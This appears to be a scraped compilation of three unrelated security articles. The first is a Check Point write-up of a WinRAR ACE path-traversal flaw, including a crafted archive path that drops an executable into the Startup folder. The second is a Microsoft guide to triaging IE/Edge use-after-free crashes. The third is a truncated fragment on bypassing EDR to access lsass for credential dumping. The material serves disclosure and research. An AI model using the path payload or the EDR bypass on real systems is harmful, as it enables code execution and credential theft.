Extracting a 19 Year Old Code Execution from WinRAR

Original text by Nadav Grossman

Introduction

In this article, we tell the story of how we found a logical bug using the WinAFL fuzzer and exploited it in WinRAR to gain full control over a victim’s computer. The exploit works by just extracting an archive, and puts over 500 million users at risk. This vulnerability has existed for over 19 years(!) and forced WinRAR to completely drop support for the vulnerable format.

Background

A few months ago, our team built a multi-processor fuzzing lab and started to fuzz binaries for Windows environments using the WinAFL fuzzer. After the good results we got from our Adobe Research, we decided to expand our fuzzing efforts and started to fuzz WinRAR too.

One of the crashes produced by the fuzzer led us to an old, dated dynamic link library (dll) that was compiled back in 2006 without a protection mechanism (like ASLR, DEP, etc.) and is used by WinRAR.

We turned our focus and fuzzer to this “low hanging fruit” dll, and looked for a memory corruption bug that would hopefully lead to Remote Code Execution.
However, the fuzzer produced a test case with “weird” behavior. After researching this behavior, we found a logical bug: Absolute Path Traversal. From this point on it was simple to leverage this vulnerability to a remote code execution.

Perhaps it’s also worth mentioning that a substantial amount of money in various bug bounty programs is offered for these types of vulnerabilities.

Figure 1: Zerodium tweet on purchasing WinRAR vulnerability.

What is WinRAR?

WinRAR is a trialware file archiver utility for Windows which can create and view archives in RAR or ZIP file formats and unpack numerous archive file formats.

According to the WinRAR website, over 500 million users worldwide make WinRAR the world’s most popular compression tool today.

This is what the GUI looks like:

Figure 2: WinRAR GUI.

The Fuzzing Process Background

These are the steps taken to start fuzzing WinRAR:

  1. Creation of an internal harness inside the WinRAR main function which enables us to fuzz any archive type, without stitching a specific harness for each format. This is done by patching the WinRAR executable.
  2. Eliminate GUI elements such as message boxes and dialogs which require user interaction. This is also done by patching the WinRAR executable.
    There are some message boxes that pop up even in CLI mode of WinRAR.
  3. Use a giant corpus from an interesting piece of research conducted around 2005 by the University of Oulu.
  4. Fuzz the program with WinAFL using WinRAR command line switches. These force WinRAR to parse the “broken archive” and also set default passwords (“-p” for password and “-kb” for keep broken extracted files). We found those options in a WinRAR manual/help file.

After a short time of fuzzing, we found several crashes in the extraction of several archive formats such as RAR, LZH and ACE that were caused by a memory corruption vulnerability such as Out-of-Bounds Write. The exploitation of these vulnerabilities, though, is not trivial because the primitives supplied limited control over the overwritten buffer.

However, a crash related to the parsing of the ACE format caught our eye. We found that WinRAR uses a dll named unacev2.dll for parsing ACE archives. A quick look at this dll revealed that it’s an old dated dll compiled in 2006 without a protection mechanism. In the end, it turned out that we didn’t even need to bypass them.

Build a Specific Harness

We decided to focus on this dll because it looked like it would be quick and easy to exploit.

Also, as far as WinRAR is concerned, as long as the archive file has a .rar extension, it would handle it according to the file’s magic bytes, in our case – the ACE format.

To improve the fuzzer performance, and to increase the coverage only on the relevant dll, we created a specific harness for unacev2.dll .

To do that, we need to understand how unacev2.dll is used. After reverse engineering the code calling unacev2.dll for ACE archive extraction, we found that two exported functions should be called for extraction in the following order:

  1. An initialization function named ACEInitDll, with the following signature:
    INT __stdcall ACEInitDll(unknown_struct_1 *struct_1);
    • struct_1: pointer to an unknown struct
  2. An extraction function named ACEExtract , with the following signature:
    INT __stdcall ACEExtract(LPSTR ArchiveName, unknown_struct_2 *struct_2);
    ArchiveName: string pointer to the path to the ace file to be extracted
    struct_2: pointer to an unknown struct

Both of these functions required structs that are unknown to us. We had two options to try to understand the unknown struct: reversing and debugging WinRAR, or trying to find an open source project that uses those structs.

The first option is more time consuming, so we opted to try the second one. We searched github.com for the exported function ACEInitDll
and found a project named FarManager that uses this dll and includes a detailed header file for the unknown structs.
Note: The creator of this project is also the creator of WinRAR.

After loading the header files to IDA, it was much easier to understand the previously “unknown structs” to both functions (ACEInitDll and ACEExtract ),  as IDA displayed the correct name and type for each struct member.

From the headers we found in the FarManager project, we came up with the following signature:

INT __stdcall ACEInitDll(pACEInitDllStruc DllData);

INT __stdcall ACEExtract(LPSTR ArchiveName, pACEExtractStruc Extract);

To mimic the way that WinRAR uses unacev2.dll , we assigned the same struct member just as WinRAR did.

We started to fuzz this specific harness, but we didn’t find new crashes and the coverage did not expand in the first few hours of the fuzzing. We tried to understand the reason for this limitation.

We started by looking for information about the ACE archive format.

Understanding the ACE Format

We didn’t find a RFC for that format, but we did find vital information over the internet.

1. Creating an ACE archive is protected by a patent. The only software that is allowed to create an ACE archive is WinACE. The last version of this program was compiled in November 2007. The company’s website has been down since August 2017. However, extracting an ACE archive is not protected by a patent.

2. A pure Python project named acefile is mentioned in this Wikipedia page. Its most useful features are:

  • It can extract an ACE archive.
  • It contains a brief explanation about the ACE file format.
  • It has a very helpful feature that prints the file format header with an explanation.

To understand the ACE file format, let’s create a simple .txt file (named “simple_file.txt”), and compress it using WinACE. We will then check the headers of the ACE file using acefile .

This is simple_file.txt

Figure 3: File before compression.

These are the options we selected in WinACEto create our example:

Figure 4: WinACE compression GUI.

This option creates the subdirectories \users\nadavgr\Documents under the chosen extraction directory and extracts simple_file.txt to that relative path.

simple_file.ace

Figure 5: The simple_file.ace produced using WinACE’s “store” compression option for visibility.

Running acefile.py from the acefile project using headers flags displays information about the archive headers:

Figure 6: Parsing ACE file header using acefile.py.

This results in:

Figure 7: acefile.py header parsing output.

Notes:

  • Consider each “\\” from the filename field in the image above as a single slash “\”, this is just python escaping.
  • For clarity, the same fields are marked with the same color in the hex dump and in the output fromacefile.

Summary of the important fields:

  • hdr_crc (marked in pink):
    Two CRC fields are present in 2 headers. If the CRC doesn’t match the data, the extraction
    is interrupted. This is the reason why the fuzzer didn’t find more paths (expand its coverage).To “solve” this issue we patched all the CRC* checks in unacev2.dll .*Note – The CRC is a modified implementation of the regular CRC-32.
  • filename (marked in green):
    It contains the relative path to the file. All the directories specified in the relative path are created during the extracting process (including the file). The size of the filename is defined by 2 bytes (little endian) marked by a black frame in the hex dump.
  • advert (marked in yellow)
    The advert field is automatically added by WinACE, during the creation of an ACE archive, if the archive is created using an unregistered version of WinACE.
  • file content:
    • origsize ” – The content’s size. The content itself is positioned after the header that defines the file (“hdr_type” field == 1).
    • hdr_size ” – The header size. Marked by a gray frame in the hex dump.
    • At offset 70 (0x46) from the second header, we can find our file content: “Hello From Check Point!”

Because the filename field contains the relative path to the file, we did some manual modification attempts to the field to see if it is vulnerable to “Path Traversal.”
For example, we added the trivial path traversal gadget “\..\” to the filename field and more complex “Path Traversal” tricks as well, but without success.

After patching all the structure checks, such as the CRC validation, we once again activated our fuzzer. After a short time of fuzzing, we entered the main fuzzing directory and found something odd. But let’s first describe our fuzzing machine for some necessary background.

The Fuzzing Machine

To increase the fuzzer performance and to prevent an I\O bottleneck, we used a RAM disk drive that uses the ImDisk toolkit on the fuzzing machine.

The Ram disk is mapped to drive R:\, and the folder tree looks like this:

Figure 8: Fuzzer’s folders hierarchy

Detecting the Path Traversal Bug

A short time after starting the fuzzer, we found a new folder named sourbe in a surprising location, in the root of drive R:\

Figure 9: ”sourbe”, the unexpected folder which created during fuzzing.

The harness is instructed to extract the fuzzed archive to sub-directories under “output_folders”. For example, R:\ACE_FUZZER\output_folders\Slave_2\ . So why do we have a new folder created in the parent directory?

Inside the sourbe folder we found a file named RED VERSION_¶ with the following content:

Figure 10: Content of the file that produced by the fuzzer in the unexpected path “R:\sourbe\RED VERSION_¶”.

This is the hex dump of the test case that triggers the vulnerability:

Figure 11: A hex dump of the file that produced by the fuzzer in the unexpected path “R:\sourbe\RED VERSION_¶”.

Notes:

  • We made some minor changes to this test case, (such as adjusting the CRC) to make it parsable by acefile.
  • For convenience, fields are marked with the same color in the hex dump and in
    the output from acefile.

Figure 12: Header parsing output from acefile.py for the file that produced by the fuzzer in the unexpected path.

These are the first three things that we noticed when we looked at the hex dump and the output from acefile:

  1. The fuzzer copied parts of the “advert” field to other fields:
    • The content of the compressed file is “SIO”, marked in an orange frame in the hex dump. It’s part of the advert string “*UNREGISTERED VERSION*”.
    • The filename field contain the string “RED VERSION*” which is part of the advert string “*UNREGISTERED VERSION*”.
  2. The path in the filename field was used in the extraction process as an “absolute path” instead of a relative path to the destination folder (the backslash is the root of the drive).
  3. The extract file name is “RED VERSION_¶”. It seems that the asterisk from the filename field was converted to an underscore and the \x14\ (0x14) value represented as “¶” in the extract file name. The other content of the filename field is ignored because there is a null char which terminates the string, after the \x14\ (0x14) value.

To find the constraints that caused it to ignore the destination folder and use the filename field as an absolute path during the extraction, we did the following attempts, based on our assumptions.

Our first assumption was the first character of the filename field (the ‘\’ char) triggers the vulnerability. Unfortunately, after a quick check we found out that this is not the case. After additional checks we arrived at these conclusions:

  1. The first char should be a ‘/’ or a ‘\’.
  2. ‘*’ should be included in the filename at least once; the location doesn’t matter.

Example of a filename field that triggers the bug: \some_folder\some_file*.exe will be extracted to C:\some_folder\some_file_.exe , and the asterisk is converted to an underscore (_).

Now that it worked on our fuzzing harness, it is time to test our crafted archive (e.g. exploit file) file on WinRAR.

Trying the exploit on WinRAR

At first glance, it looked like the exploit worked as expected on WinRAR, because the sourbe directory was created in the root of drive C:\ . However, when we entered the “sourbe” folder (C:\sourbe ) we noticed that the file was not created.

These behaviors raised two questions:

  • Why did the harness and WinRAR behave differently?
  • Why were the directories that were specified in the exploit file created, and the extracted file was not created?
Why did the harness and WinRAR behave differently?

We expected that the exploit file would behave the same on WinRAR as it behaved in our harness, for the following reasons:

  1. The dll (unacev2.dll ) extracts the files to the destination folder, and not the outer executable (WinRAR or our harness).
  2. Our harness mimics WinRAR perfectly when passing parameters / struct members to the dll.

A deeper look showed that we had a false assumption in our second point. Our harness defines 4 callbacks pointers, and our implemented callbacks differ from WinRAR’s callbacks. Let’s return to our harness implementation.

We mentioned this signature when calling the exported function named ACEInitDll.

INT __stdcall ACEInitDll(pACEInitDllStruc DllData);

pACEInitDllStruc is a pointer to the sACEInitDLLStruc struct. The first member of this struct is tACEGlobalDataStruc. This struct has many members, including pointers to callback functions with the following signature:

INT (__stdcall *InfoCallbackProc) (pACEInfoCallbackProcStruc Info);

INT (__stdcall *ErrorCallbackProc) (pACEErrorCallbackProcStruc Error);

INT (__stdcall *RequestCallbackProc) (pACERequestCallbackProcStruc Request);

INT (__stdcall *StateCallbackProc) (pACEStateCallbackProcStruc State);

These callbacks are called by the dll (unacev2.dll ) during the extraction process.
The callbacks are used as external validators for operations that about to happen, such as the creation of a file, creation of a directory, overwriting a file, etc.
The external callback/validators get information about the operation that’s about to occur, for example, file extraction, and returns its decision to the dll.

If the operation is allowed, the following constant is returned to the dll: ACE_CALLBACK_RETURN_OK Otherwise, if the operation is not allowed by the callback function, it returns the following constant: ACE_CALLBACK_RETURN_CANCEL, and the operation is aborted.

For more information about those callbacks function, see the explanation from the FarManager.

Our harness returned ACE_CALLBACK_RETURN_OK  for all the callback functions except for the ErrorCallbackProc, where it returned ACE_CALLBACK_RETURN_CANCEL.

It turns out, WinRAR does validation for the extracted filename (after they are extracted and created), and because of those validations in the WinRAR callback’s, the creation of the file was aborted. This means that after the file is created, it is deleted by WinRAR.

WinRAR Validators / Callbacks

This is part of the WinRAR callback’s validator pseudo-code that prevents the file creation:

Figure 13: WinRAR validator/callback pseudo-code.

SourceFileName” represents the relative path to the file that will be extracted.

The function does the following checks:

  1. The first char does not equal “\” or “/”.
  2. The File Name doesn’t start with the following strings “..\” or “../” which are gadgets for “Path Traversal”.
  3. The following “Path Traversal” gadgets does not exist in the string:
    1. \..\
    2. \../
    3. /../
    4. /..\

The extraction function in unacv2.dll calls StateCallbackProc in WinRAR, and passes the filename field of the ACE format as the relative path to be extracted to.

The relative path is checked by the WinRAR callback’s validator. The validators return ACE_CALLBACK_RETURN_CANCEL to the dll, (because the filename field starts with backslash “\”) and the file creation is aborted.

The following string passes to the WinRAR callback’s validator:

“\sourbe\RED VERSION_¶”

Note: This is the original filename with fields “\sourbe\RED VERSION*¶”. “unacev2.dll ” replaces the “*” with an underscore.

Why were the folders that were specified in the exploit file created and the extracted file was not created?

Because of a bug in the dll (“unacev2.dll ”), even if ACE_CALLBACK_RETURN_CANCEL returned from the callback, the folders specified in the relative path (filename field in ACE archive) will be created by the dll.

The reason for this is that unacev2.dll calls the external validator (callback) before the folder creation, but it checks the return value from the callbacks too late – after the creation of the folder. Therefore, it aborts the extraction operation just before writing content to the extracted file, before the call to WriteFile API.

It actually creates the extracted file, without writing content to it.  It calls to CreateFile API
and then checks the return code from the callback function. If the return code is ACE_CALLBACK_RETURN_CANCEL, it actually deletes the file that previously created by the call to CreateFile API.

Side Notes:

  • We found a way to bypass the deletion of the file, but it allows us to create empty files only. We can bypass the file deletion by adding “:” to the end of the file, which is treated as Alternate Data Streams. If the callback returns ACE_CALLBACK_RETURN_CANCEL, dll tries to delete the Alternate Data Stream of the file instead of the file itself.
  • There is another filter function in the dll code that aborts the extraction operation if the relative path string starts with “\” (slash). This happens in the first extraction stages, before the calls to any other filter function.
    However, by adding “*”or “?” characters (wildcard characters) to the relative path (filename field) of the compressed file, this check is skipped and the code flow can continue and (partially) trigger the Path Traversal vulnerability. This is why the exploit file which was produced by the fuzzer triggered the bug in our harness. It doesn’t trigger the bug in WinRAR because of the callback validator in the WinRAR code.

Summary of Intermediate Findings

  • We found a Path Traversal vulnerability in unacev2.dll . It enables our harness to extract the file to an arbitrary path, and completely ignore the destination folder, and treats the extracted file relative path as the full path.
  • Two constraints lead to the Path Traversal vulnerability (summarized in previous sections):
    1. The first char should be a ‘/’ or a ‘\’.
    2. ‘*’ should be included in the filename at least once. The location does not matter.
  • WinRAR is partially vulnerable to the Path Traversal:
    • unacev2.dll doesn’t abort the operation after getting the abort code from the WinRAR callback (ACE_CALLBACK_RETURN_CANCEL). Due to this delayed check of the return code from WinRAR callback, the directories specified in the exploit file are created.
    • The extracted file is created as well, on the full path specified in the exploit file (without content), but it is deleted right after checking the returned code from the callback (before the call to WriteFile API).
    • We found a way to bypass the deletion of the file, but it allows us to create empty files only.

Finding the Root Cause

At this point, we wanted to figure out why the destination folder is ignored, and the relative path of the archive files (filename field) is treated as the full path.

To achieve this goal, we could use static analysis and debugging, but we decided on a much quicker method. We used DynamoRio to record the code coverage in unacev2.dll of a regular ACE file and of our exploit file which triggered the bug. We then used the lighthouse plugin for IDA and subtracted one coverage path from the other.

These are the results we got:

Figure 14: Lighthouse’s coverage overview window. You can see the coverage subtraction in the “Composer” form, and one result highlighted in purple.

In the “Coverage Overview” window we can see a single result. This means there is only one basic block that was executed in the first attempt (marked in A) and wasn’t reached on the second attempt (marked in B).

The Lighthouse plugin marked the background of the diffed basic block in blue, as you can see in the image below.

Figure 15: IDA graph view of the main bug in unacev2.dll. Lighthouse marked the background of the diffed basic block in blue.

From the code coverage results, you can understand that the exploit file is not going through the diffed basic block (marked in blue), but it takes the opposite basic block (the false condition, marked with a red arrow).

If the code flow goes through the false condition (red arrow) the line that is inside the green frame replaces the destination folder with "" (empty string), and the later call to sprintf function, which concatenates the destination folder to the relative path of the extracted file.

The code flow to the true and false conditions, marked with green and red arrows respectively,
is influenced by the call to the function named GetDevicePathLen (inside the red frame).

If the result from the call to GetDevicePathLen equals 0, the sprintf looks like this:

sprintf(final_file_path, "%s%s", destination_folder, file_relative_path);

Otherwise:

sprintf(final_file_path, "%s%s", "", file_relative_path);

The last sprintf is the buggy code that triggers the Path Traversal vulnerability.

This means that the relative path will actually be treated as a fullpath to the file/directory that should be written/created.

Let’s look at GetDevicePathLen function to get a better understanding of the root cause:

Figure 16: GetDevicePathLen code.

The relative path of the extracted file is passed to GetDevicePathLen.
It checks if the device or drive name prefix appears in the Path parameter, and returns the length of that string, like this:

  • The function returns 3 for this path: C:\some_folder\some_file.ext
  • The function returns 1 for this path: \some_folder\some_file.ext
  • The function returns 15 for this path: \\LOCALHOST\C$\some_folder\some_file.ext
  • The function returns 21 for this path: \\?\Harddisk0Volume1\some_folder\some_file.ext
  • The function returns 0 for this path: some_folder\some_file.ext

If the return value from GetDevicePathLen is greater than 0, the relative path of the extracted file will be considered as the full path, because the destination folder is replaced by  an empty string during the call to sprintf, and this leads to Path Traversal vulnerability.

However, there is a function that “cleans” the relative path of the extract file, by omitting any sequences that are not allowed before the call to GetDevicePathLen.

This is a pseudo-code that cleans the path “CleanPath”.

Figure 17: Pseudo-code of CleanPath.

The function omits trivial Path Traversal sequences like “\..\”  (it only omits the “..\” sequence if it is found in the beginning of the path)  sequence, and it omits drive sequence like: “C:\C:”, and for an unknown reason, “C:\C:” as well.

Note that it doesn’t care about the first letter; the following sequence will be omitted as well: “_:\”, “_:”, “_:\_:” (In this case underscore represents any value).

Putting It All Together

To create an exploit file, which causes WinRAR to extract an archived file to an arbitrary path (Path Traversal),  extract to the Startup Folder (which gains code execution after reboot) instead of to the destination folder.

We should bypass two filter functions to trigger the bug.

To trigger the concatenation of an empty string to the relative path of the compressed file, instead of the destination folder:

sprintf(final_file_path, "%s%s", "", file_relative_path);

Instead of:

sprintf(final_file_path, "%s%s", destination_folder, file_relative_path);

The result from GetDevicePathLen function should be greater than 0.
It depends on the content of the relative path (“file_relative_path”). If the relative path starts the device path this way:

  • option 1C:\some_folder\some_file.ext
  • option 2\some_folder\some_file.ext (The first slash represents the current drive.)

The return value from GetDevicePathLen will be greater than 0.
However, there is a filter function in unacev2.dll named CleanPath (Figure 17) that checks if the relative path starts with C:\ and removes it from the relative path string before the call to GetDevicePathLen.

It omits the “C:\” sequence from the option 1 string but doesn’t omit “\” sequence from the option 2 string.

To overcome this limitation, we can add to option 1 another “C:\” sequence which will be omitted by CleanPath (Figure 17), and leave the relative path to the string as we wanted with one “C:\”,  like:

  • option 1’C:\C:\some_folder\some_file.ext  =>  C:\some_folder\some_file.ext

However, there is a callback function in WinRAR code (Figure 13), that is used as a validator/filter function. During the extraction process, unacev2.dll is called to the callback function that resides in the WinRAR code.

The callback function validates the relative path of the compressed file. If the blacklist sequence is found, the extraction operation will be aborted.

One of the checks that is made by the callback function is for the relative path that starts with “\” (slash).
But it doesn’t check for the  “C:\Therefore, we can use option 1’ to exploit the Path Traversal Vulnerability!

We also found an SMB attack vector, which enables it to connect to an arbitrary IP address and create files and folders in arbitrary paths on the SMB server.

Example:
C:\\\10.10.10.10\smb_folder_name\some_folder\some_file.ext => \\10.10.10.10\smb_folder_name\some_folder\some_file.ext

Example of a Simple Exploit File

We change the .ace extension to .rar extension, because WinRAR detects the format by the content of the file and not by the extension.

This is the output from acefile:

Figure 18: Header output by acefile.py of the simple exploit file.

We trigger the vulnerability by the crafted string of the filename field (in green).

This archive will be extracted to C:\some_folder\some_file.txt no matter what the path of the destination folder is.

Creating a Real Exploit

We can gain code execution, by extracting a compressed executable file from the ACE archive to one of the Startup Folders. Any files that reside in the Startup folders will be executed at boot time.
To craft an ACE archive that extracts its compressed files to the Startup folder seems to be trivial, but it’s not.
There are at least 2 Startup folders at the following paths:

  1. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
  2. C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The first path of the Startup folder demands high privileges / high integrity level (in case the UAC is on). However, WinRAR runs by default with a medium integrity level.

The second path of the Startup folder demands to know the name of the user.

We can try to overcome it by creating an ACE archive with thousands of crafted compressed files, any one of which contains the path to the Startup folder but with different <user name>, and hope that it will work in our target.

The Most Powerful Vector

We have found a vector which allows us to extract a file to the Startup folder without caring about the <user name>.

By using the following filename field in the ACE archive:

C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe

It is translated to the following path by the CleanPath function (Figure 17):

C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe

Because the CleanPath function removes the “C:\C: ” sequence.

Moreover, this destination folder will be ignored because the GetDevicePathLen function (Figure 16) will return 2 for the last “C:” sequence.

Let’s analyze the last path:

The sequence “C:” is translated by Windows to the “current directory” of the running process. In our case, it’s the current path of WinRAR.

If WinRAR is executed from its folder, the “current directory” will be this WinRAR folder: C:\Program Files\WinRAR

However, if WinRAR is executed by double clicking on an archive file or by right clicking on “extract” in the archive file, the “current directory” of WinRAR will be the path to the folder that the archive resides in.

Figure 19: WinRAR’s extract options (WinRAR’s shell extension added to write click)

For example, if the archive resides in the user’s Downloads folder, the “current directory” of WinRAR will be:
  C:\Users\<user name>\Downloads
If the archive resides in the Desktop folder, the “current directory” path will be:
  C:\Users\<user name>\Desktop

To get from the Desktop or Downloads folder to the Startup folder, we should go back one folder  “../” to the “user folder”, and concatenate  the relative path to the startup directory: AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ to the following sequence: “C:../

This is the end result:  C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe

Remember that there are 2 checks against path traversal sequences:

  • In the CleanPath function which skips such sequences.
  • In WinRAR’s callback function which aborts the extraction operation.

CleanPath checks for the following path traversal pattern: “\..\

The WinRAR’s callback function checks for the following patterns:

  1. “\..\”
  2. “\../”
  3. “/../”
  4. “/..\”

Because the first slash or backslash are not part of our sequence “C:../”, we can bypass the path traversal validation. However, we can only go back one folder. It’s all we need to extract a file to the Startup folder without knowing the user name.

Note: If we want to go back more than one folder, we should concatenate the following sequence “/../”. For example, “C:../../” and the “/../” sequence will be caught be the callback validator function and the extraction will be aborted.

Demonstration (POC)

Side Note

Toward the end of our research, we discovered that WinACE created an extraction utility like unacev2.dll for linux which is called unace-nonfree (compiled using Watcom compiler). The source code is available.
The source code for Windows (which unacev2.dll was built from) is included as well, but it’s older than the last version of unacev2.dll , and can’t be compiled/built for Windows. In addition,  some functionality is missing in the source code – for example, the checks in Figure 17 are not included.

However, Figure 16 was taken from the source code.
We also found the Path Traversal bug in the source code. It looks like this:

Figure 20:  The path traversal bug in the source code of unace-nonfree


CVEs:

CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253.

WinRAR’s Response

WinRAR decided to drop UNACEV2.dll from their package, and WinRAR doesn’t support ACE format from version number: “5.70 beta 1”.

Quote from WinRAR website:

“Nadav Grossman from Check Point Software Technologies informed us about a security vulnerability in UNACEV2.DLL library.
Aforementioned vulnerability makes possible to create files in arbitrary folders inside or outside of destination folder 
when unpacking ACE archives. 
WinRAR used this third party library to unpack ACE archives.
UNACEV2.DLL had not been updated since 2005 and we do not have access to its source code.
So we decided to drop ACE archive format support to protect security of WinRAR users.

We are thankful to Check Point Software Technologies for reporting  this issue.“

Check Point’s SandBlast Agent Behavioral Guard protect against these threats.

Check Point’s IPS blade provides protections against this threat: “RARLAB WinRAR ACE Format Input Validation Remote Code Execution (CVE-2018-20250)”

Реклама

Triaging the exploitability of IE/EDGE crashes

Original text by swiat

Introduction

Both Internet Explorer (IE) and Edge have seen significant changes in order to help protect customers from security threats. This work has featured a number of mitigations that together have not only rendered classes of vulnerabilities not-exploitable, but also dramatically raised the cost for attackers to develop a working exploit.

Because of these changes, determining the exploitability of crashes has become increasingly complicated, as the effect of these mitigations must be taken into account during analysis. We have received a number of requests from the security community for clarification on how these mitigations affect exploitability.  To ensure that only valid issues are submitted, we thought it may be useful to offer some guidance.

 

Use after free mitigations

Use-after-free (UAF) is a common type of vulnerability in modern object-orientated software. They are caused when an instance of an object is freed while a pointer to the object is still kept by the program. Since the object instance has been freed, this pointer is dangling, pointing to unmapped memory. Such a vulnerability is exploitable when the unmapped memory is controllable by an attacker, and will be used when the dangling pointer is later dereferenced by the program. We can split UAF vulnerabilities into 3 classes based upon where the dangling pointer is stored: the stack, heap, and the registers.

We have developed two primary mitigations to protect against UAFs:

  • Memory Protector (MP) [IE10 and below]

MP is designed to protect objects against UAFs where the reference is stored on the stack, or in a register.

  • MemGC [Edge & IE11]

MemGC is a new replacement for MP, currently enabled on Edge and IE11. Protected objects are only freed when no references exist on the stack, heap or registers, offering complete coverage. 

 

Exploitability & Servicing

MemGC [Edge & IE11]

  • We consider UAFs that are addressed by MemGC strongly mitigated, and will not issue a security update for them.
  • The only exception for this are rare cases where zero writing the object leads to an exploitable state, although we have yet to see an occurrence of this.

Memory Protector [IE10 and below]

  • We consider stack and register based UAFs strongly mitigated and will not issue a security update for them, except in the circumstances explained below.
  • Heap reference based UAFs are not mitigated by MP, and so will still be addressed via a security update.

 

Triaging crashes

Memory protector

Memory protector (MP) is a mitigation first introduced in July 2014 initially for all supported versions of Internet Explorer, but now only applies to IE 10 and below. It is designed to mitigate a subset of use-after-free vulnerabilities, due to dangling pointers stored on the stack or the registers. At a high level, it works as follows:

  1. When delete is called on an object instance, its contents is zero wrote, and it is placed in a queue. Once the queue has reached a threshold size, we then begin the process of seeing if it is safe to free each object instance in the queue.
  2. To test to see if it is safe to free an object instance, we scan both the registers and all pointer aligned stack entries to see if there exists a pointer to the object. If no pointer is found then the object is freed, otherwise the object is kept in the queue.

Part (1) of the algorithm delays the potential freeing of the object to a later point in time, is controllable by an attacker, and as such is not considered a security mitigation.

To make it easier to determine the exploitability of these issues, MP has a mode called “Stress Mode”. Under this mode the delayed free component (1) of MP is disabled: stack/register scanning happens on every free, rather than when the queue has reached a threshold length. It can be enabled with the registry key:

HKLM:/Software/Microsoft/Internet Explorer/Main/Feature Control/FEATURE_MEMPROTECT_MODE/iexplore.exe DWORD 2

(note that this key, and “Stress Mode” are only applicable to MP, not MemGC).

Example crash

With the delayed free component of MP now disabled by forcing the object instance to be freed at the earliest possible instant, we can now concentrate on determining exploitability, based on Part (2), as shown by an illustrative example below:

In this case, we have a use-after-free vulnerability causing a near-null dereference. Tracing backwards, we can see that the value of eax was set a few instructions previously:

If we look at this object in memory, we see that has been zero wrote, and by checking the PageHeap End Magic we can see that this heap chunk is still allocated under Stress Mode:

Now we need to see if there are any stack references to this object instance, starting at the call frame when delete was called. This can be completed using windbg scripting: for example, scanning for references to an object with base address stored in ebx with size 0x30:

Checking stack reference locations with MP

In this case, we find a single reference to the object instance on the stack. With this information we must now check to see which call frame contains this reference.

Here, we show an example call stack at the point when the object is deleted:

If there is a reference to an object instance on the stack or registers, then MP will never free the object instance. Thus, if between the point delete is first called in frame_2 until the point when we crash with a near null dereference in frame_5 there is always a stack reference, the object instance cannot be freed and reallocated/controlled by an attacker.

In this example, the reference we found by scanning the stack (at 0x1024ae9c) is stored in frame_8. Since this reference is present all of the time between the freeing point in frame_2 and the crashing point in frame_8, we consider this case as not-exploitable since it is strongly mitigated by MP.

Two other main situations can also occur:

  1. If (for example) the stack reference was in frame_3 rather than frame_8, then there is a period between the freeing of the object and the crashing point when there are no stack references. This case may be exploitable since if the code path between these points can be slightly altered to force another call to delete, we will be left with an exploitable situation.
  2. When running under stress mode, the crash may now occur on a freed block since the delayed free component is disabled (usually due to the reference being stored on the heap). Under this circumstance, the case would be generally exploitable.

MemGC

MemGC is a new replacement for MP, currently available in Edge and all supported versions of IE11, and mitigates use-after-free vulnerabilities in a similar fashion as MP. However, it also offers additional protection by scanning the heap for references to protected object types, as well as the stack and registers. MemGC will zero write upon free and will delay the actual free until garbage collection is triggered and no references to the freed object are found.

Just like MP, mitigated use-after-free vulnerabilities will most likely result in a near-null pointer dereferences or occasionally in no crash at all. If you suspect that a near-null pointer dereference is actually a mitigated use-after-free vulnerability you can verify this with the following steps:

  • Find the position where the near-null value is read, determining the base pointer of the object:

If we dump the object, we can see that it has been zero wrote as before:

  • Trace back and find the allocation call stack for this chunk, using the base pointer that was found in the first step. If the object is allocated with edgehtml!MemoryProtection::HeapAlloc() or edgehtml!MemoryProtection::HeapAllocClear() it means that the object is tracked by MemGC e.g.

Similarly, when the object is freed, it will be via edgehtml!MemoryProtection::HeapFree() e.g.

To double check that the issue is successfully mitigated, we can scan for references to the object on both the heap and stack.

For scanning the stack, we can use the same technique as described in the Memory Protector section. We can then use the same criteria as described above to determine exploitability; if there exists a stack reference between the freeing point and crashing point, we consider it strongly mitigated by MemGC.

When scanning the heap, we use a similar method, by first scanning the heap for references with values between the base pointer and basepointer+object_size of the object we are interested in. If any references are found, we then just need to check to see what objects they are associated with. If the object containing the reference is also tracked by MemGC (i.e. allocated via HeapAlloc() or HeapAllocClear()), then MemGC will not free the object we are interested in, so we consider it strongly mitigated by MemGC.

In this example, if we use the stack scanning command from above, we see that there is a reference on the stack preventing the object from being freed between the deletion and crashing points, making it successfully mitigated by MemGC.

Conclusions

In conclusion these new mitigations dramatically enhance the security by making sets of use-after-free vulnerabilities non-exploitable. When triaging issues in both IE & Edge, the behavior of these mitigations needs to be taken into account in order to determine the exploitability of these issues.

Acknowledgments

We would like to thank the following people for their contribution to this post:

Chris Betz, Crispin Cowan, John Hazen, Gavin Thomas, Marek Zmyslowski, Matt Miller, Mechele Gruhn, Michael Plucinski, Nicolas Joly, Phil Cupp, Sermet Iskin, Shawn Richardson and Suha Can

Stephen Fleming & Richard van Eeden.  MSRC Engineering, Vulnerabilities & Mitigations Team.

Bypass EDR’s memory protection, introduction to hooking

Original text by Hoang Bui

Introduction

On a recent internal penetration engagement, I was faced against an EDR product that I will not name. This product greatly hindered my ability to access lsass’ memory and use our own custom flavor of Mimikatz to dump clear-text credentials.

For those who recommends ProcDump

The Wrong Path

So now, as an ex-malware author — I know that there are a few things you could do as a driver to accomplish this detection and block. The first thing that comes to my mind was Obregistercallback which is commonly used by many Antivirus products. Microsoft implemented this callback due to many antivirus products performing very sketchy winapi hooks that reassemble malware rootkits. However, at the bottom of the msdn page, you will notice a text saying “Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008.” To give some missing context, I am on a Windows server 2003 at the moment. Therefore, it is missing the necessary function to perform this block.

After spending hours and hours, doing black magic stuff with csrss.exe and attempting to inherit a handle to lsass.exe through csrss.exe, I was successful in gaining a handle with PROCESS_ALL_ACCESS to lsass.exe. This was through abusing csrss to spawn a child process and then inherit the already existing handle to lsass.

There is no EDR solution on this machine, this was just an PoC

